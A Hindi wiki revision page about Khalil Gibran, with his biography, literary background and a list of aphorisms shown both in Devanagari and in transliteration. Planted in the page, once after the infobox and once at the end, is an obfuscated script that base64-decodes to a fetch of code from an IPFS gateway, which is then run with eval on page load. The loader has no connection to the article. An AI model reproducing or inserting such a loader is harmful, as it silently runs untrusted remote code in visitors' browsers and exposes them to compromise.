Difference between revisions of "ख़लील जिब्रान"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "अविभावक" to "अभिभावक")
 
(3 intermediate revisions by 2 users not shown)
Line 13: Line 13:
 
|संतान=
 
|संतान=
 
|कर्म भूमि=
 
|कर्म भूमि=
|कर्म-क्षेत्र=दार्शनिक, कवि, चित्रकार  
+
|कर्म-क्षेत्र=दार्शनिक, [[कवि]], चित्रकार  
 
|मुख्य रचनाएँ=
 
|मुख्य रचनाएँ=
 
|विषय=
 
|विषय=
Line 32: Line 32:
 
|अद्यतन=
 
|अद्यतन=
 
}}
 
}}
 
+
'''ख़लील जिब्रान''' ([[अंग्रेज़ी]]: Khalil Gibran, जन्म: [[6 जनवरी]], [[1883]]; मृत्यु: [[10 अप्रॅल]], [[1931]]) विश्व के श्रेष्ठ चिंतक महाकवि के रूप में ख्याति प्राप्त करने वाले महान् दार्शनिक थे। देश-विदेश भ्रमण करने वाले ख़लील जिब्रान [[अरबी भाषा|अरबी]], अंग्रेज़ी, [[फ़ारसी भाषा|फ़ारसी ]] के ज्ञाता, दार्शनिक और चित्रकार भी थे।  
'''ख़लील जिब्रान''' ([[अंग्रेज़ी]]: Khalil Gibran, जन्म: [[6 जनवरी]], [[1883]]; मृत्यु: [[10 अप्रॅल]], [[1931]]) विश्व के श्रेष्ठ चिंतक महाकवि के रूप में ख्याति प्राप्त करने वाले महान दार्शनिक थे। देश-विदेश भ्रमण करने वाले ख़लील जिब्रान [[अरबी भाषा|अरबी]], अंग्रेज़ी, [[फ़ारसी भाषा|फ़ारसी ]] के ज्ञाता, दार्शनिक और चित्रकार भी थे।  
 
 
==जन्म==
 
==जन्म==
ख़लील जिब्रान [[6 जनवरी]] [[1883]] को लेबनान के 'बथरी' नगर में एक संपन्न परिवार में पैदा हुए। 12 वर्ष की आयु में ही माता-पिता के साथ बेल्जियम, फ्रांस, अमेरिका आदि देशों में भ्रमण करते हुए [[1912]] में [[अमेरिका]] के [[न्यूयॉर्क नगर|न्यूयॉर्क]] में स्थायी रूप से रहने लगे थे।
+
ख़लील जिब्रान [[6 जनवरी]] [[1883]] को लेबनान के 'बथरी' नगर में एक संपन्न परिवार में पैदा हुए। 12 वर्ष की आयु में ही माता-पिता के साथ बेल्जियम, [[फ़्राँस]], [[अमेरिका]] आदि देशों में भ्रमण करते हुए [[1912]] में [[अमेरिका]] के [[न्यूयॉर्क नगर|न्यूयॉर्क]] में स्थायी रूप से रहने लगे थे।
 +
==उच्च कोटि के सुभाषित==
 +
ख़लील जिब्रान अपने विचार, जो उच्च कोटि के सुभाषित या कहावत रूप में होते थे, उन्हें [[काग़ज़]] के टुकड़ों, थिएटर के कार्यक्रम के काग़ज़ों, सिगरेट की डिब्बियों के गत्तों तथा फटे हुए लिफाफों पर लिखकर रख देते थे। उनकी सेक्रेटरी श्रीमती बारबरा यंग को उन्हें इकट्ठी कर प्रकाशित करवाने का श्रेय जाता है। उन्हें हर बात या कुछ कहने के पूर्व एक या दो वाक्य सूत्र रूप में सूक्ति कहने की आदत थी।
 +
;देश निकाला
 +
उन्हें अपने चिंतन के कारण समकालीन पादरियों और अधिकारी वर्ग का कोपभाजन होने से जाति से बहिष्कृत करके देश निकाला तक दे दिया गया था।
 
==साहित्यिक परिचय==
 
==साहित्यिक परिचय==
ख़लील जिब्रान के साहित्य–संसार को मुख्य रूप से दो प्रकारों में रखा जा सकता है-
+
ख़लील जिब्रान के साहित्य-संसार को मुख्य रूप से दो प्रकारों में रखा जा सकता है-
# जीवन–विषयक गम्भीर चिन्तनपरक लेखन
+
# जीवन-विषयक गम्भीर चिन्तनपरक लेखन।
# गद्यकाव्य, उपन्यास, रूपककथाएँ आदि
+
# गद्यकाव्य, उपन्यास, रूपककथाएँ आदि।
मानव एवं पशु–पक्षियों के उदाहरण लेकर मनुष्य जीवन का कोई तत्त्व स्पष्ट करने या कहने के लिए रूपककथा, प्रतीककथा अथवा नीतिकथा का माध्यम हमारे भारतीय पाठकों व लेखकों के लिए नया नहीं है। [[पंचतन्त्र]], [[हितोपदेश]] इत्यादि लघुकथा–संग्रहों से भारतीय पाठक भलीभाँति परिचित हैं। ख़लील जिब्रान ने भी इस माध्यम को लेकर अनेक लघुकथाएँ लिखी हैं। समस्त संसार के सुधी पाठक उनकी इन अप्रतिम रचनाओं के दीवाने है।
+
मानव एवं पशु-पक्षियों के उदाहरण लेकर मनुष्य जीवन का कोई तत्त्व स्पष्ट करने या कहने के लिए रूपककथा, प्रतीककथा अथवा नीतिकथा का माध्यम हमारे भारतीय पाठकों व लेखकों के लिए नया नहीं है। [[पंचतन्त्र]], [[हितोपदेश]] इत्यादि लघुकथा-संग्रहों से भारतीय पाठक भलीभाँति परिचित हैं। ख़लील जिब्रान ने भी इस माध्यम को लेकर अनेक लघुकथाएँ लिखी हैं। समस्त संसार के सुधी पाठक उनकी इन अप्रतिम रचनाओं के दीवाने हैं।<ref name="wdh">{{cite web |url=http://hindi.webdunia.com/miscellaneous/literature/remembrance/0705/04/1070504016_1.htm |title=खलील जिब्रान |accessmonthday=26 जनवरी |accessyear=2013 |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher=वेबदुनिया हिंदी |language=हिंदी}}</ref>
वे अपने विचार जो उच्च कोटि के सुभाषित या कहावत रूप में होते थे, उन्हें कागज के टुकड़ों, थिएटर के कार्यक्रम के [[कागज|कागजों]], सिगरेट की डिब्बियों के गत्तों तथा फटे हुए लिफाफों पर लिखकर रख देते थे। उनकी सेक्रेटरी श्रीमती बारबरा यंग को उन्हें इकट्ठी कर प्रकाशित करवाने का श्रेय जाता है। उन्हें हर बात या कुछ कहने के पूर्व एक या दो वाक्य सूत्र रूप में सूक्ति कहने की आदत थी।<ref name="wdh">{{cite web |url=http://hindi.webdunia.com/miscellaneous/literature/remembrance/0705/04/1070504016_1.htm |title=खलील जिब्रान |accessmonthday=26 जनवरी |accessyear=2013 |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher=वेबदुनिया हिंदी |language=हिंदी}}</ref>
 
 
====अद्भुत कल्पना शक्ति====
 
====अद्भुत कल्पना शक्ति====
 
उनमें अद्भुत कल्पना शक्ति थी। वे अपने विचारों के कारण कविवर [[रवीन्द्रनाथ टैगोर]] के समकक्ष ही स्थापित होते थे। उनकी रचनाएं 22 से अधिक भाषाओं में देश-विदेश में तथा [[हिन्दी]], [[गुजराती भाषा|गुजराती]], [[मराठी भाषा|मराठी]], [[उर्दू भाषा|उर्दू]] में अनुवादित हो चुकी हैं। इनमें उर्दू तथा मराठी में सबसे अधिक अनुवाद प्राप्त होते हैं। उनके चित्रों की प्रदर्शनी भी कई देशों में लगाई गई, जिसकी सभी ने मुक्तकंठ से प्रशंसा की। वे [[ईसा मसीह|ईसा]] के अनुयायी होकर भी पादरियों और अंधविश्वास के कट्टर विरोधी रहे। देश से निष्कासन के बाद भी अपनी देशभक्ति के कारण अपने देश हेतु सतत लिखते रहे।<ref name="wdh"/>
 
उनमें अद्भुत कल्पना शक्ति थी। वे अपने विचारों के कारण कविवर [[रवीन्द्रनाथ टैगोर]] के समकक्ष ही स्थापित होते थे। उनकी रचनाएं 22 से अधिक भाषाओं में देश-विदेश में तथा [[हिन्दी]], [[गुजराती भाषा|गुजराती]], [[मराठी भाषा|मराठी]], [[उर्दू भाषा|उर्दू]] में अनुवादित हो चुकी हैं। इनमें उर्दू तथा मराठी में सबसे अधिक अनुवाद प्राप्त होते हैं। उनके चित्रों की प्रदर्शनी भी कई देशों में लगाई गई, जिसकी सभी ने मुक्तकंठ से प्रशंसा की। वे [[ईसा मसीह|ईसा]] के अनुयायी होकर भी पादरियों और अंधविश्वास के कट्टर विरोधी रहे। देश से निष्कासन के बाद भी अपनी देशभक्ति के कारण अपने देश हेतु सतत लिखते रहे।<ref name="wdh"/>
Line 48: Line 50:
 
==ख़लील जिब्रान की श्रेष्ठतम सूक्तियां==
 
==ख़लील जिब्रान की श्रेष्ठतम सूक्तियां==
 
{| class="bharattable-pink"
 
{| class="bharattable-pink"
 +
|-
 +
|
 +
* सत्य को जानना चाहिए, पर उसको कहना कभी-कभी चाहिए।
 
|-
 
|-
 
|  
 
|  
* सत्य को जानना चाहिए पर उसको कहना कभी-कभी चाहिए।
+
* दानशीलता यह नहीं है कि तुम मुझे वह वस्तु दे दो, जिसकी मुझे आवश्यकता तुमसे अधिक है, बल्कि यह है कि तुम मुझे वह वस्तु दो, जिसकी आवश्यकता तुम्हें मुझसे अधिक है।
 
|-
 
|-
 
|  
 
|  
* दानशीलता यह नहीं है कि तुम मुझे वह वस्तु दे दो, जिसकी मुझे आवश्यकता तुमसे अधिक है, बल्कि यह है कि तुम मुझे वह वस्तु दो, जिसकी आवश्यकता तुम्हें मुझसे अधिक है।
+
* कुछ सुखों की इच्छा ही मेरे दुःखों का अंश है।
 
|-
 
|-
 
|  
 
|  
 
* यदि तुम अपने अंदर कुछ लिखने की प्रेरणा का अनुभव करो तो तुम्हारे भीतर ये बातें होनी चाहिए-
 
* यदि तुम अपने अंदर कुछ लिखने की प्रेरणा का अनुभव करो तो तुम्हारे भीतर ये बातें होनी चाहिए-
# ज्ञान कला का जादू
+
#ज्ञान कला का जादू
# शब्दों के संगीत का ज्ञान
+
#शब्दों के संगीत का ज्ञान
# श्रोताओं को मोह लेने का जादू
+
#श्रोताओं को मोह लेने का जादू
 +
|-
 +
|
 +
* यदि तुम्हारे हाथ रुपए से भरे हुए हैं तो फिर वे परमात्मा की वंदना के लिए कैसे उठ सकते हैं।
 
|-
 
|-
 
|  
 
|  
Line 65: Line 73:
 
|-
 
|-
 
|  
 
|  
* जो पुरुष स्त्रियों के छोटे-छोटे अपराधों को क्षमा नहीं करते, वे उनके महान गुणों का सुख नहीं भोग सकते।
+
* जो पुरुष स्त्रियों के छोटे-छोटे अपराधों को क्षमा नहीं करते, वे उनके महान् गुणों का सुख नहीं भोग सकते।
 +
|-
 +
|
 +
* मित्रता सदा एक मधुर उत्तरदायित्व है, न कि स्वार्थपूर्ति का अवसर।
 +
|-
 +
|
 +
* मंदिर के द्वार पर हम सभी भिखारी ही हैं।
 
|-
 
|-
 
|  
 
|  
 
* यदि अतिथि नहीं होते तो सब घर क़ब्र बन जाते।
 
* यदि अतिथि नहीं होते तो सब घर क़ब्र बन जाते।
 +
|-
 +
|
 +
* यदि तुम्हारे [[हृदय]] में ईर्ष्या, घृणा का ज्वालामुखी धधक रहा है, तो तुम अपने हाथों में फूलों के खिलने की आशा कैसे कर सकते हो?
 
|-
 
|-
 
|  
 
|  
 
* यथार्थ में अच्छा वही है जो उन सब लोगों से मिलकर रहता है जो बुरे समझे जाते हैं।
 
* यथार्थ में अच्छा वही है जो उन सब लोगों से मिलकर रहता है जो बुरे समझे जाते हैं।
 +
|-
 +
|
 +
* इससे बड़ा और क्या अपराध हो सकता है कि दूसरों के अपराधों को जानते रहें।
 
|-
 
|-
 
|  
 
|  
 
* यथार्थ महापुरुष वह आदमी है जो न दूसरे को अपने अधीन रखता है और न स्वयं दूसरों के अधीन होता है।
 
* यथार्थ महापुरुष वह आदमी है जो न दूसरे को अपने अधीन रखता है और न स्वयं दूसरों के अधीन होता है।
 +
|-
 +
|
 +
* अतिशयोक्ति एक ऐसी यथार्थता है जो अपने आपे से बाहर हो गई है।
 
|-
 
|-
 
|  
 
|  
Line 84: Line 107:
 
|  
 
|  
 
* इच्छा आधा जीवन है और उदासीनता आधी मौत।
 
* इच्छा आधा जीवन है और उदासीनता आधी मौत।
 +
|-
 +
|
 +
* निःसंदेह नमक में एक विलक्षण पवित्रता है, इसीलिए वह हमारे आँसुओं में भी है और [[समुद्र]] में भी।
 
|-
 
|-
 
|  
 
|  
Line 92: Line 118:
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
*[http://oshosatsang.org/2011/11/28/%E0%A4%A6%E0%A4%BF-%E0%A4%AE%E0%A5%88%E0%A4%A1%E0%A4%AE%E0%A5%88%E0%A4%A8-%E0%A4%96%E0%A4%B2%E0%A5%80%E0%A4%B2-%E0%A4%9C%E0%A4%BF%E0%A4%AC%E0%A5%8D%E0%A4%B0%E0%A4%BE%E0%A4%A8-%E0%A4%93%E0%A4%B6/ दि मैडमैन: खलील जिब्रान (ओशो की प्रिय पुस्‍तकें)]
 
*[http://oshosatsang.org/2011/11/28/%E0%A4%A6%E0%A4%BF-%E0%A4%AE%E0%A5%88%E0%A4%A1%E0%A4%AE%E0%A5%88%E0%A4%A8-%E0%A4%96%E0%A4%B2%E0%A5%80%E0%A4%B2-%E0%A4%9C%E0%A4%BF%E0%A4%AC%E0%A5%8D%E0%A4%B0%E0%A4%BE%E0%A4%A8-%E0%A4%93%E0%A4%B6/ दि मैडमैन: खलील जिब्रान (ओशो की प्रिय पुस्‍तकें)]
 
*[http://khaleelzibran.blogspot.in/ ख़लील जिब्रान]
 
*[http://khaleelzibran.blogspot.in/ ख़लील जिब्रान]
 
==संबंधित लेख==
 
==संबंधित लेख==
{{दार्शनिक}}
+
{{दार्शनिक}}[[Category:दार्शनिक]]
[[Category:दार्शनिक]]
 
 
[[Category:कवि]][[Category:चित्रकार]][[Category:दर्शन कोश]][[Category:साहित्य कोश]][[Category:कला कोश]]
 
[[Category:कवि]][[Category:चित्रकार]][[Category:दर्शन कोश]][[Category:साहित्य कोश]][[Category:कला कोश]]
 
__INDEX__
 
__INDEX__
__NOTOC__
 

Latest revision as of 05:39, 6 January 2018

khalil jibran
poora nam khalil jibran
janm 6 janavari 1883
janm bhoomi 'bathari' nagar, lebanan
mrityu 10 aprail 1931
mrityu sthan nyooy aaurk, amerika
karm-kshetr darshanik, kavi, chitrakar
bhasha arabi, aangrezi, farasi
any janakari inaki rachanaean 22 se adhik bhashaoan mean desh-videsh mean tatha hindi, gujarati, marathi, urdoo mean anuvadit ho chuki haian.
inhean bhi dekhean kavi soochi, sahityakar soochi

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

khalil jibran (aangrezi: Khalil Gibran, janm: 6 janavari, 1883; mrityu: 10 aprॅl, 1931) vishv ke shreshth chiantak mahakavi ke roop mean khyati prapt karane vale mahanh darshanik the. desh-videsh bhraman karane vale khalil jibran arabi, aangrezi, farasi ke jnata, darshanik aur chitrakar bhi the.

janm

khalil jibran 6 janavari 1883 ko lebanan ke 'bathari' nagar mean ek sanpann parivar mean paida hue. 12 varsh ki ayu mean hi mata-pita ke sath beljiyam, fraans, amerika adi deshoan mean bhraman karate hue 1912 mean amerika ke nyooy aaurk mean sthayi roop se rahane lage the.

uchch koti ke subhashit

khalil jibran apane vichar, jo uchch koti ke subhashit ya kahavat roop mean hote the, unhean kagaz ke tuk doan, thietar ke karyakram ke kagazoan, sigaret ki dibbiyoan ke gattoan tatha phate hue liphaphoan par likhakar rakh dete the. unaki sekretari shrimati barabara yang ko unhean ikatthi kar prakashit karavane ka shrey jata hai. unhean har bat ya kuchh kahane ke poorv ek ya do vaky sootr roop mean sookti kahane ki adat thi.

desh nikala

unhean apane chiantan ke karan samakalin padariyoan aur adhikari varg ka kopabhajan hone se jati se bahishkrit karake desh nikala tak de diya gaya tha.

sahityik parichay

khalil jibran ke sahity-sansar ko mukhy roop se do prakaroan mean rakha ja sakata hai-

  1. jivan-vishayak gambhir chintanaparak lekhan.
  2. gadyakavy, upanyas, roopakakathaean adi.

manav evan pashu-pakshiyoan ke udaharan lekar manushy jivan ka koee tattv spasht karane ya kahane ke lie roopakakatha, pratikakatha athava nitikatha ka madhyam hamare bharatiy pathakoan v lekhakoan ke lie naya nahian hai. panchatantr, hitopadesh ityadi laghukatha-sangrahoan se bharatiy pathak bhalibhaanti parichit haian. khalil jibran ne bhi is madhyam ko lekar anek laghukathaean likhi haian. samast sansar ke sudhi pathak unaki in apratim rachanaoan ke divane haian.[1]

adbhut kalpana shakti

unamean adbhut kalpana shakti thi. ve apane vicharoan ke karan kavivar ravindranath taigor ke samakaksh hi sthapit hote the. unaki rachanaean 22 se adhik bhashaoan mean desh-videsh mean tatha hindi, gujarati, marathi, urdoo mean anuvadit ho chuki haian. inamean urdoo tatha marathi mean sabase adhik anuvad prapt hote haian. unake chitroan ki pradarshani bhi kee deshoan mean lagaee gee, jisaki sabhi ne muktakanth se prashansa ki. ve eesa ke anuyayi hokar bhi padariyoan aur aandhavishvas ke kattar virodhi rahe. desh se nishkasan ke bad bhi apani deshabhakti ke karan apane desh hetu satat likhate rahe.[1]

nidhan

48 varsh ki ayu mean kar durghatana mean ganbhir roop se ghayal hokar 10 aprail 1931 ko unaka nyooy aaurk mean hi dehaant ho gaya. unake nidhan ke bad hajaroan log unake aantim darshanoan ko ate rahe. bad mean unhean apani janmabhoomi ke girajaghar mean daphanaya gaya.[1]

khalil jibran ki shreshthatam sooktiyaan

  • saty ko janana chahie, par usako kahana kabhi-kabhi chahie.
  • danashilata yah nahian hai ki tum mujhe vah vastu de do, jisaki mujhe avashyakata tumase adhik hai, balki yah hai ki tum mujhe vah vastu do, jisaki avashyakata tumhean mujhase adhik hai.
  • kuchh sukhoan ki ichchha hi mere duahkhoan ka aansh hai.
  • yadi tum apane aandar kuchh likhane ki prerana ka anubhav karo to tumhare bhitar ye batean honi chahie-
  1. jnan kala ka jadoo
  2. shabdoan ke sangit ka jnan
  3. shrotaoan ko moh lene ka jadoo
  • yadi tumhare hath rupe se bhare hue haian to phir ve paramatma ki vandana ke lie kaise uth sakate haian.
  • bahut-si striyaan purushoan ke man ko moh leti haian. parantu birali hi striyaan haian jo apane vash mean rakh sakati haian.
  • jo purush striyoan ke chhote-chhote aparadhoan ko kshama nahian karate, ve unake mahanh gunoan ka sukh nahian bhog sakate.
  • mitrata sada ek madhur uttaradayitv hai, n ki svarthapoorti ka avasar.
  • mandir ke dvar par ham sabhi bhikhari hi haian.
  • yadi atithi nahian hote to sab ghar qabr ban jate.
  • yadi tumhare hriday mean eershya, ghrina ka jvalamukhi dhadhak raha hai, to tum apane hathoan mean phooloan ke khilane ki asha kaise kar sakate ho?
  • yatharth mean achchha vahi hai jo un sab logoan se milakar rahata hai jo bure samajhe jate haian.
  • isase b da aur kya aparadh ho sakata hai ki doosaroan ke aparadhoan ko janate rahean.
  • yatharth mahapurush vah adami hai jo n doosare ko apane adhin rakhata hai aur n svayan doosaroan ke adhin hota hai.
  • atishayokti ek aisi yatharthata hai jo apane ape se bahar ho gee hai.
  • danashilata yah hai ki apani samarthy se adhik do aur svabhiman yah hai ki apani avashyakata se kam lo.
  • sansar mean keval do tatv haian- ek sauandary aur doosara saty. sauandary prem karane valoan ke hriday mean hai aur saty kisan ki bhujaoan mean.
  • ichchha adha jivan hai aur udasinata adhi maut.
  • niahsandeh namak mean ek vilakshan pavitrata hai, isilie vah hamare aansuoan mean bhi hai aur samudr mean bhi.
  • yadi tum jati, desh aur vyaktigat pakshapatoan se jara ooanche uth jao to niahsandeh tum devata ke saman ban jaoge.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. 1.0 1.1 1.2 khalil jibran (hiandi) (ech.ti.em.el) vebaduniya hiandi. abhigaman tithi: 26 janavari, 2013.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>